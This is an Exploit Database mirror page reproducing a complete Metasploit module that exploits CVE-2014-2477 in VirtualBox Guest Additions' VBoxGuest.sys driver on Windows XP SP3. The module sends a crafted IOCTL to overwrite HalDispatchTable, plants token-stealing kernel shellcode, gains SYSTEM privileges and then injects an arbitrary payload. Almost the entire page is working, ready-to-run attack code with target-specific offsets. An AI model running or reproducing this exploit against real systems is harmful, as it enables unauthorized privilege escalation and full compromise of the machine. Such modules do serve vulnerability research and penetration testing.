Oracle VM VirtualBox Guest Additions 4.3.10r93012 – ‘VBoxGuest.sys’ Local Privilege Escalation (Metasploit)

• Exploit Database
• 145 阅读

• 作者： Metasploit
  日期： 2014-08-13
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/34333/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215

  ## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ##   require &apos;msf/core&apos; require &apos;msf/core/exploit/local/windows_kernel&apos; require &apos;rex&apos;   class Metasploit3 < Msf::Exploit::Local Rank = AverageRanking   include Msf::Exploit::Local::WindowsKernel include Msf::Post::File include Msf::Post::Windows::FileInfo include Msf::Post::Windows::Priv include Msf::Post::Windows::Process   def initialize(info={}) super(update_info(info, { &apos;Name&apos;=> &apos;VirtualBox Guest Additions VBoxGuest.sys Privilege Escalation&apos;, &apos;Description&apos;=> %q{ A vulnerability within the VBoxGuest driver allows an attacker to inject memory they control into an arbitrary location they define. This can be used by an attacker to overwrite HalDispatchTable+0x4 and execute arbitrary code by subsequently calling NtQueryIntervalProfile on Windows XP SP3 systems. This has been tested with VBoxGuest Additions up to 4.3.10r93012. }, &apos;License&apos; => MSF_LICENSE, &apos;Author&apos;=> [ &apos;Matt Bergin <level[at]korelogic.com>&apos;, # Vulnerability discovery and PoC &apos;Jay Smith <jsmith[at]korelogic.com>&apos; # MSF module ], &apos;Arch&apos;=> ARCH_X86, &apos;Platform&apos;=> &apos;win&apos;, &apos;SessionTypes&apos;=> [ &apos;meterpreter&apos; ], &apos;DefaultOptions&apos; => { &apos;EXITFUNC&apos; => &apos;thread&apos;, }, &apos;Targets&apos; => [ [&apos;Windows XP SP3&apos;, { &apos;HaliQuerySystemInfo&apos; => 0x16bba, &apos;_KPROCESS&apos;=> "\x44", &apos;_TOKEN&apos; => "\xc8", &apos;_UPID&apos;=> "\x84", &apos;_APLINKS&apos; => "\x88" } ] ], &apos;References&apos;=> [ [&apos;CVE&apos;, &apos;2014-2477&apos;], [&apos;URL&apos;, &apos;https://www.korelogic.com/Resources/Advisories/KL-001-2014-001.txt&apos;] ], &apos;DisclosureDate&apos;=> &apos;Jul 15 2014&apos;, &apos;DefaultTarget&apos; => 0 }))   end   def fill_memory(proc, address, length, content)   session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ address ].pack("L"), nil, [ length ].pack("L"), "MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN", "PAGE_EXECUTE_READWRITE")   if not proc.memory.writable?(address) vprint_error("Failed to allocate memory") return nil else vprint_good("#{address} is now writable") end   result = proc.memory.write(address, content)   if result.nil? vprint_error("Failed to write contents to memory") return nil else vprint_good("Contents successfully written to 0x#{address.to_s(16)}") end   return address end   def check if sysinfo["Architecture"] =~ /wow64/i or sysinfo["Architecture"] =~ /x64/ return Exploit::CheckCode::Safe end   handle = open_device(&apos;\\\\.\\vboxguest&apos;, &apos;FILE_SHARE_WRITE|FILE_SHARE_READ&apos;, 0, &apos;OPEN_EXISTING&apos;) if handle.nil? return Exploit::CheckCode::Safe end session.railgun.kernel32.CloseHandle(handle)   os = sysinfo["OS"] unless (os =~ /windows xp.*service pack 3/i) return Exploit::CheckCode::Safe end   file_path = expand_path("%windir%") << "\\system32\\drivers\\vboxguest.sys" unless file?(file_path) return Exploit::CheckCode::Unknown end   major, minor, build, revision, branch = file_version(file_path) vprint_status("vboxguest.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}")   unless (major == 4) return Exploit::CheckCode::Safe end   case minor when 0 return Exploit::CheckCode::Vulnerable if build < 26 when 1 return Exploit::CheckCode::Vulnerable if build < 34 when 2 return Exploit::CheckCode::Vulnerable if build < 26 when 3 return Exploit::CheckCode::Vulnerable if build < 12 end   return Exploit::CheckCode::Safe end   def exploit if is_system? fail_with(Exploit::Failure::None, &apos;Session is already elevated&apos;) end   if sysinfo["Architecture"] =~ /wow64/i fail_with(Failure::NoTarget, "Running against WOW64 is not supported") elsif sysinfo["Architecture"] =~ /x64/ fail_with(Failure::NoTarget, "Running against 64-bit systems is not supported") end   unless check == Exploit::CheckCode::Vulnerable fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system") end   handle = open_device(&apos;\\\\.\\vboxguest&apos;, &apos;FILE_SHARE_WRITE|FILE_SHARE_READ&apos;, 0, &apos;OPEN_EXISTING&apos;) if handle.nil? fail_with(Failure::NoTarget, "Unable to open \\\\.\\vboxguest device") end   print_status("Disclosing the HalDispatchTable address...") hal_dispatch_table = find_haldispatchtable if hal_dispatch_table.nil? session.railgun.kernel32.CloseHandle(handle) fail_with(Failure::Unknown, "Filed to disclose HalDispatchTable") else print_good("Address successfully disclosed.") end   print_status(&apos;Getting the hal.dll base address...&apos;) hal_info = find_sys_base(&apos;hal.dll&apos;) fail_with(Failure::Unknown, &apos;Failed to disclose hal.dll base address&apos;) if hal_info.nil?   hal_base = hal_info[0] print_good("hal.dll base address disclosed at 0x#{hal_base.to_s(16).rjust(8, &apos;0&apos;)}") hali_query_system_information = hal_base + target[&apos;HaliQuerySystemInfo&apos;]   print_status("Storing the shellcode in memory...") this_proc = session.sys.process.open   restore_ptrs ="\x31\xc0" # xor eax, eax restore_ptrs << "\xb8" + [hali_query_system_information].pack(&apos;V&apos;) # mov eax, offset hal!HaliQuerySystemInformation restore_ptrs << "\xa3" + [hal_dispatch_table + 4].pack(&apos;V&apos;)# mov dword ptr [nt!HalDispatchTable+0x4], eax   kernel_shell = token_stealing_shellcode(target) kernel_shell_address = 0x1   buf = "\x90" * 0x6000 buf[0, 56] = "\x50\x00\x00\x00" * 14 buf[0x5000, kernel_shell.length] = restore_ptrs + kernel_shell   result = fill_memory(this_proc, kernel_shell_address, buf.length, buf) if result.nil? session.railgun.kernel32.CloseHandle(handle) fail_with(Failure::Unknown, "Error while storing the kernel stager shellcode on memory") else print_good("Kernel stager successfully stored at 0x#{kernel_shell_address.to_s(16)}") end   print_status("Triggering the vulnerability, corrupting the HalDispatchTable...") session.railgun.ntdll.NtDeviceIoControlFile(handle, nil, nil, nil, 4, 0x22a040, 0x1, 140, hal_dispatch_table + 0x4 - 40, 0) session.railgun.kernel32.CloseHandle(handle)   print_status("Executing the Kernel Stager throw NtQueryIntervalProfile()...") session.railgun.ntdll.NtQueryIntervalProfile(2, 4)   print_status("Checking privileges after exploitation...")   unless is_system? fail_with(Failure::Unknown, "The exploitation wasn&apos;t successful") else print_good("Exploitation successful!") end   p = payload.encoded print_status("Injecting #{p.length.to_s} bytes to memory and executing it...") if execute_shellcode(p) print_good("Enjoy") else fail_with(Failure::Unknown, "Error while executing the payload") end   end   end